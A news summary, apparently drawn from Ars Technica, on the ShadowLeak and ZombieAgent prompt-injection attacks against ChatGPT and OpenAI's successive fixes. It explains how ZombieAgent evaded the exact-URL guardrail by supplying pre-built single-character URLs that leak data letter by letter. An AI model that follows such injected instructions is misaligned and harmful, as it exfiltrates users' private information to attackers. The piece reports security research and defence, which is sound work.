Key Points
- OpenAI limited ChatGPT to opening only exact URLs supplied by users, blocking the ShadowLeak attack.
- Radware’s ZombieAgent used pre‑built URLs with a single appended character to bypass the initial guardrails.
- A second OpenAI fix now blocks email‑originated links unless they are publicly indexed or user‑provided.
- Experts note that such fixes are temporary and liken the pattern to long‑standing software vulnerabilities.
- Radware’s Pascal Geenens warns that fundamental solutions are needed to fully mitigate prompt‑injection risks.
Background of the attacks
Researchers discovered a prompt‑injection technique called ShadowLeak that coaxed ChatGPT into constructing new URLs by adding query parameters or inserting user‑derived data. By doing so, the model could inadvertently exfiltrate information.
In response, OpenAI altered the system so that ChatGPT would only open URLs that match the exact string provided by the user, refusing to modify them even when explicitly instructed.
Radware’s ZombieAgent variant
Radware demonstrated a follow‑up method named ZombieAgent. This approach supplied a list of pre‑constructed URLs, each consisting of a base address followed by a single letter or number (for example, “example.com/a” or “example.com/0”). The prompt also instructed the model to replace spaces with a special token. Because OpenAI’s initial fix did not block the addition of a single character to a base URL, the model could still access these URLs one character at a time, allowing data to be exfiltrated letter by letter.
OpenAI’s second mitigation
To counter ZombieAgent, OpenAI introduced a stricter rule: ChatGPT may not open any link originating from an email unless the link appears in a well‑known public index or is directly supplied by the user within the chat prompt. This prevents the model from automatically following base URLs that could be controlled by an attacker.
Ongoing challenges
Both incidents illustrate a recurring pattern in software security where a mitigation is quickly followed by a new workaround. Analysts compare this cycle to the persistence of SQL injection and memory‑corruption vulnerabilities, which continue to be exploited despite years of defensive measures.
Pascal Geenens, vice president of threat intelligence at Radware, emphasized that “guardrails should not be considered fundamental solutions for the prompt injection problems. Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”
Source: arstechnica.com